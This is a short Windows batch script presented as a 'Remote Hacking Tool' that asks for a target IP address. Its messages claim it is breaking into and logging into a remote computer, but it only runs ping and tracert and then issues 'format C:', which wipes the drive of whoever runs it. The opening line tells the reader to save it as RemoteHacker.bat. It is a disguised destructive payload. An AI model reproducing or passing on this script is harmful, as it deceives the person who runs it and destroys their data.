Delete this line, and save this file as RemoteHacker.bat

@ECHO OFF
cls
title Remote Hacking Tool
set /p tohack= What is the ip of the user you would like to hack?
echo Starting:
echo Starting entry to computer
ping %tohack%
echo Done
echo Starting remote login
tracert %tohack%
echo Done
echo You are now logged in, Type Y to complete the hack
echo there will be an icon on the desktop,
echo To remotely access his computer
format C: